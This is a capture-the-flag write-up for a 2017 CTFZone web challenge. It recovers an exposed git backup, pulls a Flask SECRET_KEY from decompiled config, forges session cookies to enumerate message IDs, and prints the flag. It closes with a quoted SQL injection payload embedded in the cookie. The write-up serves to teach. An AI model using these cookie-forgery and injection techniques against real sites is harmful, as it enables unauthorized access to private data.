One of our candidates used to send restricted data to colleagues via this service because it's free and easy to use. Try to get some secrets which can compromise them. 82.202.204.104
I launched dirb and I found there was a /backup/ folder which seems to be a /.git/ folder.
Update: Such a folder can be created with this git command: git init --separate-git-dir backup/.
$ ~/CTF/tools/GitTools/Extractor/extractor.sh repo extractedrepo ########### # Extractor is part of https://github.com/internetwache/GitTools # # Developed and maintained by @gehaxelt from @internetwache # # Use at your own risk. Usage might be illegal in certain circumstances. # Only for educational purposes! ########### [*] Destination folder does not exist [*] Creating... [+] Found commit: 8b1084b23d869e5dc1ae4ac845589ecfb896c0c3 [+] Found file: /home/noraj/CTF/CTFZone/2017/extractedrepo/0-8b1084b23d869e5dc1ae4ac845589ecfb896c0c3/.gitignore [+] Found file: /home/noraj/CTF/CTFZone/2017/extractedrepo/0-8b1084b23d869e5dc1ae4ac845589ecfb896c0c3/requirements.txt [+] Found folder: /home/noraj/CTF/CTFZone/2017/extractedrepo/0-8b1084b23d869e5dc1ae4ac845589ecfb896c0c3/static [+] Found folder: /home/noraj/CTF/CTFZone/2017/extractedrepo/0-8b1084b23d869e5dc1ae4ac845589ecfb896c0c3/static/css [+] Found file: /home/noraj/CTF/CTFZone/2017/extractedrepo/0-8b1084b23d869e5dc1ae4ac845589ecfb896c0c3/static/css/bootstrap.min.css [+] Found file: /home/noraj/CTF/CTFZone/2017/extractedrepo/0-8b1084b23d869e5dc1ae4ac845589ecfb896c0c3/static/css/login.css [+] Found file: /home/noraj/CTF/CTFZone/2017/extractedrepo/0-8b1084b23d869e5dc1ae4ac845589ecfb896c0c3/static/css/main.css [+] Found file: /home/noraj/CTF/CTFZone/2017/extractedrepo/0-8b1084b23d869e5dc1ae4ac845589ecfb896c0c3/static/css/material-input.css [+] Found file: /home/noraj/CTF/CTFZone/2017/extractedrepo/0-8b1084b23d869e5dc1ae4ac845589ecfb896c0c3/static/flag.txt [+] Found folder: /home/noraj/CTF/CTFZone/2017/extractedrepo/0-8b1084b23d869e5dc1ae4ac845589ecfb896c0c3/static/js [+] Found file: /home/noraj/CTF/CTFZone/2017/extractedrepo/0-8b1084b23d869e5dc1ae4ac845589ecfb896c0c3/static/js/bootstrap.min.js [+] Found folder: /home/noraj/CTF/CTFZone/2017/extractedrepo/0-8b1084b23d869e5dc1ae4ac845589ecfb896c0c3/templates [+] Found file: /home/noraj/CTF/CTFZone/2017/extractedrepo/0-8b1084b23d869e5dc1ae4ac845589ecfb896c0c3/templates/index.html [+] Found file: /home/noraj/CTF/CTFZone/2017/extractedrepo/0-8b1084b23d869e5dc1ae4ac845589ecfb896c0c3/templates/login.html [+] Found file: /home/noraj/CTF/CTFZone/2017/extractedrepo/0-8b1084b23d869e5dc1ae4ac845589ecfb896c0c3/templates/messages.html [+] Found file: /home/noraj/CTF/CTFZone/2017/extractedrepo/0-8b1084b23d869e5dc1ae4ac845589ecfb896c0c3/templates/register.html [+] Found commit: 9f848cceeba31da2cbd2c8ecaebb8a8dab17eee4 [+] Found file: /home/noraj/CTF/CTFZone/2017/extractedrepo/1-9f848cceeba31da2cbd2c8ecaebb8a8dab17eee4/.gitignore [+] Found file: /home/noraj/CTF/CTFZone/2017/extractedrepo/1-9f848cceeba31da2cbd2c8ecaebb8a8dab17eee4/requirements.txt [+] Found folder: /home/noraj/CTF/CTFZone/2017/extractedrepo/1-9f848cceeba31da2cbd2c8ecaebb8a8dab17eee4/static [+] Found folder: /home/noraj/CTF/CTFZone/2017/extractedrepo/1-9f848cceeba31da2cbd2c8ecaebb8a8dab17eee4/static/css [+] Found file: /home/noraj/CTF/CTFZone/2017/extractedrepo/1-9f848cceeba31da2cbd2c8ecaebb8a8dab17eee4/static/css/bootstrap.min.css [+] Found file: /home/noraj/CTF/CTFZone/2017/extractedrepo/1-9f848cceeba31da2cbd2c8ecaebb8a8dab17eee4/static/css/login.css [+] Found file: /home/noraj/CTF/CTFZone/2017/extractedrepo/1-9f848cceeba31da2cbd2c8ecaebb8a8dab17eee4/static/css/main.css [+] Found file: /home/noraj/CTF/CTFZone/2017/extractedrepo/1-9f848cceeba31da2cbd2c8ecaebb8a8dab17eee4/static/css/material-input.css [+] Found folder: /home/noraj/CTF/CTFZone/2017/extractedrepo/1-9f848cceeba31da2cbd2c8ecaebb8a8dab17eee4/static/js [+] Found file: /home/noraj/CTF/CTFZone/2017/extractedrepo/1-9f848cceeba31da2cbd2c8ecaebb8a8dab17eee4/static/js/bootstrap.min.js [+] Found folder: /home/noraj/CTF/CTFZone/2017/extractedrepo/1-9f848cceeba31da2cbd2c8ecaebb8a8dab17eee4/templates [+] Found file: /home/noraj/CTF/CTFZone/2017/extractedrepo/1-9f848cceeba31da2cbd2c8ecaebb8a8dab17eee4/templates/index.html [+] Found file: /home/noraj/CTF/CTFZone/2017/extractedrepo/1-9f848cceeba31da2cbd2c8ecaebb8a8dab17eee4/templates/login.html [+] Found file: /home/noraj/CTF/CTFZone/2017/extractedrepo/1-9f848cceeba31da2cbd2c8ecaebb8a8dab17eee4/templates/messages.html [+] Found file: /home/noraj/CTF/CTFZone/2017/extractedrepo/1-9f848cceeba31da2cbd2c8ecaebb8a8dab17eee4/templates/register.html [+] Found commit: bd55b19e5413ce609d3bc4429c3a6f272341988a [+] Found file: /home/noraj/CTF/CTFZone/2017/extractedrepo/2-bd55b19e5413ce609d3bc4429c3a6f272341988a/.gitignore [+] Found file: /home/noraj/CTF/CTFZone/2017/extractedrepo/2-bd55b19e5413ce609d3bc4429c3a6f272341988a/config.pyc [+] Found file: /home/noraj/CTF/CTFZone/2017/extractedrepo/2-bd55b19e5413ce609d3bc4429c3a6f272341988a/requirements.txt [+] Found folder: /home/noraj/CTF/CTFZone/2017/extractedrepo/2-bd55b19e5413ce609d3bc4429c3a6f272341988a/templates [+] Found file: /home/noraj/CTF/CTFZone/2017/extractedrepo/2-bd55b19e5413ce609d3bc4429c3a6f272341988a/templates/index.html [+] Found file: /home/noraj/CTF/CTFZone/2017/extractedrepo/2-bd55b19e5413ce609d3bc4429c3a6f272341988a/templates/login.html [+] Found file: /home/noraj/CTF/CTFZone/2017/extractedrepo/2-bd55b19e5413ce609d3bc4429c3a6f272341988a/templates/messages.html [+] Found file: /home/noraj/CTF/CTFZone/2017/extractedrepo/2-bd55b19e5413ce609d3bc4429c3a6f272341988a/templates/register.html
Now let's take a look at 2-bd55b19e5413ce609d3bc4429c3a6f272341988a/config.pyc.
Then I installed uncompyle6 to uncompile the config python file.
The Flask SECRET_KEY is generated in order to manage sessions, here it will sign cookies.
Flask cookies look like JWT (JSON Web Tokens) but that's not the same structure. JWT are header.data.signature, flask cookies are data.nonce.signature.
It seems it's our way to modify the session cookie, cookie will be invalid if we only modify it without having a valid signature (which requires the SECRET_KEY). But decoding flask cookie only require to base64 decode the first part.
Then I used BurpSuite to temper my request and modify the cookie header, just to test the range of number id:
1 2 3
Here the last message for you, 326410000000
A man who would letterspace lower case would steal sheep, Frederic Goudy liked to say. If this wisdom needs updating, it is chiefly to say that a woman who would letterspace lower case would steal sheep as well.
1 2 3
Here the last message for you, 326410000001
To be truly great, we have to understand the motivation of our clients, maintain constant two-way communication with shockingly uncreative people, get a firm handle on copywriting and how that craft exists symbiotically with the visual element, and foresee how the finished whole will be greater than the sum of the bits and pieces we spent hours obsessing over. All of these factors cascade into the final product.
1 2 3
Here the last message for you, 326410001337
My secret is being not terrible at a lot of things.
1 2 3
Here the last message for you, 326410000042
For me, design is like choosing what I’m going to wear for the day – only much more complicated and not really the same at all.
1 2 3
Here the last message for you, 326410009999
Learn from the mistakes of others. You can’t live long enough to make them all yourself.
1 2 3
Here the last message for you, 326410019999
Styles come and go. Good design is a language, not a style.
1 2 3
Here the last message for you, 326410029999
I am always driven by the terror of humiliation.
1 2 3
Here the last message for you, 326410030199
There are no bad ideas, just bad decisions.
1 2 3
Here the last message for you, 326410030239
Most [clients] expect experience design to be a discrete activity, solving all their problems with a single functional specification or a single research study. It must be an ongoing effort, a process of continually learning about users, responding to their behaviors, and evolving the product or service.
1 2 3
Here the last message for you, 326410031505
You have no messages yet
After some tests I figured that the range were like the following:
326410000000 to 326410030239 : CTF story message
326410030240 to 326410031505 : no user (You have no messages yet)
326410031506 to 326410031666+ : CTF player message (Hello! Your number is 326410031XXX. Have a nice conversation.)
The flag is in a CTF story message.
So I wrote a ruby script to dump all messages into a messages folder:
Flag was ctfzone{b1d4207ff1965105af775cfa71d8214d}.
There was another solution found by hotab from dcua. Instead of dumping every message like me it was possible to do an SQL injection into the cookie {"number":"#{payload}","username":"admin"} where #{payload} is ' union SELECT GROUP_CONCAT(message,'\n') FROM messages GROUP BY '1. That was listing you all message in one page. This was quicker.